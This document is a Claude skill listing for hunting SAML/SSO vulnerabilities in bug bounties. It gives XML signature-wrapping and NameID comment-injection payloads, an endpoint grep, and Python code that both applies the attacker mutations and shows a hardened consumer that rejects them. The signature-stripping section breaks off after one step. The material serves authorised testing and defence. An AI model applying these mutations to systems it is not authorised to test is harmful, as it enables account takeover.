
hunt-saml

Hunt SAML / SSO attacks. Patterns: XML Signature Wrapping (XSW1-XSW8): add or relocate an Assertion so the Signature still validates over the original signed element while the SP consumes the attacker's copy; comment injection in NameID (admin@target.com<!--evil-->@attacker.com: the signature covers the full canonicalized string, but some parsers return only the first text node, admin@target.com); signature stripping (remove the Signature element entirely; the SP should reject an unsigned assertion but doesn't); key confusion (assertion signed by the attacker's own IdP key, accepted by the SP); AudienceRestriction not validated; replay (the same Assertion accepted twice within its validity window). Tools: SAML Raider Burp extension, samlmagic, manual XML manipulation. Discovery: any /saml endpoint, /Shibboleth.sso, /sso/saml/, Microsoft ADFS endpoints. Validate: account takeover via altered NameID, admin role injection via altered AttributeStatement. Real paid examples on Auth0, Okta, Microsoft, custom SAML implementations. Use when hunting SSO flows, when a SAML AssertionConsumerService is reachable, when chaining IdP trust to SP impersonation.
elementalsouls/Claude-BugHunter · ★ 1,240 · API & Backend · score 82
Install: claude install-skill elementalsouls/Claude-BugHunter
## 20. SAML / SSO ATTACKS

> SSO bugs frequently pay High–Critical. XML parsers are notoriously inconsistent.

### Attack Surface

```bash
# Find SAML endpoints (anchor idp/sp to path segments; a bare "sp" matches almost every URL)
grep -iE "saml|sso|login.*redirect|oauth|/idp|/sp[/?]" recon/$TARGET/urls.txt
# Key endpoints: /saml/acs (assertion consumer service), /sso/saml, /auth/saml/callback
```

### Attack 1: XML Signature Wrapping (XSW)

```xml
<!-- BEFORE: valid assertion for user@company.com -->
<saml:Response>
  <saml:Assertion ID="legit">
    <NameID>user@company.com</NameID>
    <ds:Signature><!-- Valid, covers ID=legit --></ds:Signature>
  </saml:Assertion>
</saml:Response>

<!-- AFTER: inject an unsigned evil assertion in front. The Signature still
     validates (its Reference covers #legit, which is untouched), but an SP
     that processes the FIRST assertion it finds consumes the evil one. -->
<saml:Response>
  <saml:Assertion ID="evil">
    <NameID>admin@company.com</NameID> <!-- Attacker-controlled -->
  </saml:Assertion>
  <saml:Assertion ID="legit">
    <NameID>user@company.com</NameID>
    <ds:Signature><!-- Valid --></ds:Signature>
  </saml:Assertion>
</saml:Response>
```

### Attack 2: Comment Injection in NameID

```xml
<!-- Attacker registers the IdP identity user@company.com.attacker.com, obtains a
     legitimately signed assertion for it, then splits the NameID with a comment -->
<NameID>user@company.com<!---->.attacker.com</NameID>
<!-- Signature still verifies: canonicalization (C14N without comments) yields
     "user@company.com.attacker.com", exactly the string the IdP signed -->
<!-- Vulnerable SP reads only the first text node: "user@company.com" -->
<!-- Works when the signature verifier and the value extractor handle a
     comment-split text node differently -->
```

### Attack 3: Signature Stripping

```
1. Decode SAMLResponse: echo "BASE64" | base64 -d | xmllint --format -   # POST binding; the Redirect binding is additionally DEFLATE-compressed
```
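The three attacks above all exploit the same gap: the SP verifies a signature over one element and then reads identity data from a different node, or from no signed node at all. The following is an added example, not code from the Claude-BugHunter skill or from any SAML library. It models the SP side with Python's standard-library XML parser: a naive `vulnerable_nameid()` reader, a hardened `consume()` that enforces exactly one Assertion, an enveloped Signature whose Reference resolves to that Assertion's unique ID, and a NameID made of a single text node; and the attacker-side mutations `xsw_wrap()`, `strip_signature()` and `comment_inject()` that a tool like SAML Raider applies to a captured response. The sample response, the `_legit`/`_evil` IDs and the `user@company.com` / `.attacker.com` identities are constructed; the `ds:Signature` holds no key material, so cryptographic verification (and the separate key-trust, AudienceRestriction and replay checks) is assumed to happen in an xmlsec-backed library and is not modelled.

```python
"""Added example (not code from the Claude-BugHunter skill): the structural
checks an SP must make alongside cryptographic XML-Signature verification, and
the attacker-side mutations (XSW wrapping, signature stripping, NameID comment
injection) that beat an SP which skips them. The response is constructed; its
ds:Signature holds no key material and the crypto check itself is not modelled."""
import copy
import xml.etree.ElementTree as ET

NS = {"samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
      "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
      "ds": "http://www.w3.org/2000/09/xmldsig#"}
for _p, _u in NS.items():
    ET.register_namespace(_p, _u)

# Constructed "legitimate" response: one Assertion with an enveloped Signature
# whose single Reference points at that Assertion's ID.
LEGIT_RESPONSE = """<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
  xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
  <saml:Assertion ID="_legit">
    <saml:Subject><saml:NameID>user@company.com</saml:NameID></saml:Subject>
    <ds:Signature>
      <ds:SignedInfo><ds:Reference URI="#_legit"/></ds:SignedInfo>
      <ds:SignatureValue>AAAA</ds:SignatureValue>
    </ds:Signature>
  </saml:Assertion>
</samlp:Response>"""

def parse(xml_text):
    # Keep comment nodes, as DOM-based SAML libraries do: a comment splits a NameID into two text nodes.
    return ET.fromstring(xml_text, ET.XMLParser(target=ET.TreeBuilder(insert_comments=True)))

def vulnerable_nameid(xml_text):
    """Naive SP: first NameID in document order, first text node only."""
    return parse(xml_text).find(".//saml:NameID", NS).text

def consume(xml_text):
    """Hardened SP: return the NameID it is safe to act on, or raise ValueError."""
    root = parse(xml_text)
    assertions = root.findall("saml:Assertion", NS)
    if len(assertions) != 1:                   # defeats XSW wrapping
        raise ValueError("expected exactly one Assertion")
    assertion = assertions[0]
    sig = assertion.find("ds:Signature", NS)   # enveloped: must be a direct child
    if sig is None:                            # defeats signature stripping
        raise ValueError("Assertion is not signed")
    aid = assertion.get("ID", "")
    refs = sig.findall("ds:SignedInfo/ds:Reference", NS)
    ids = [e.get("ID") for e in root.iter() if e.get("ID") is not None]
    if len(refs) != 1 or refs[0].get("URI") != "#" + aid or ids.count(aid) != 1:
        raise ValueError("Signature Reference does not cover this Assertion")
    nameid = assertion.find("saml:Subject/saml:NameID", NS)
    # len(nameid) != 0 means a comment or child element sits inside the NameID text
    if nameid is None or len(nameid) != 0 or not (nameid.text or "").strip():
        raise ValueError("NameID missing, empty, or not a single text node")
    return nameid.text.strip()

def rejects(xml_text):
    """True when the hardened consumer refuses the response."""
    try:
        consume(xml_text)
    except ValueError:
        return True
    return False

# Attacker-side mutations (what SAML Raider automates from a captured response).
def xsw_wrap(xml_text, evil_nameid):
    """Clone the signed Assertion without its Signature, give the clone a new ID
    and NameID, and put it first; the untouched original still verifies."""
    root = parse(xml_text)
    evil = copy.deepcopy(root.find("saml:Assertion", NS))
    evil.set("ID", "_evil")
    evil.remove(evil.find("ds:Signature", NS))
    evil.find("saml:Subject/saml:NameID", NS).text = evil_nameid
    root.insert(0, evil)
    return ET.tostring(root, encoding="unicode")

def strip_signature(xml_text):
    root = parse(xml_text)
    assertion = root.find("saml:Assertion", NS)
    assertion.remove(assertion.find("ds:Signature", NS))
    return ET.tostring(root, encoding="unicode")

def comment_inject(xml_text, victim, suffix):
    """Attacker owns the IdP identity victim+suffix and splits it with an empty
    comment: C14N (itertext) still yields the full signed string, but a first-text-node reader sees only victim."""
    root = parse(xml_text)
    nameid = root.find(".//saml:NameID", NS)
    nameid.text, marker = victim, ET.Comment("")
    marker.tail = suffix
    nameid.append(marker)
    return ET.tostring(root, encoding="unicode")

if __name__ == "__main__":
    attacker = LEGIT_RESPONSE.replace("user@company.com", "user@company.com.attacker.com")
    for label, p in [("xsw", xsw_wrap(LEGIT_RESPONSE, "admin@company.com")),
                     ("stripped", strip_signature(LEGIT_RESPONSE)),
                     ("comment", comment_inject(attacker, "user@company.com", ".attacker.com"))]:
        print(f"{label:9} naive SP sees {vulnerable_nameid(p)!r}, hardened rejects: {rejects(p)}")
```

Run it directly to see each mutated payload land on the naive reader as the victim's identity while `consume()` refuses all three. When testing a real SP, the same three mutations are what you apply to the decoded SAMLResponse before re-encoding it; a target that still logs you in as the naive reader would is vulnerable. Note that `consume()` deliberately checks the Reference URI against the document's ID inventory: an XSW variant that leaves two elements with the same ID is how the signature is kept "valid" while the SP resolves the wrong one.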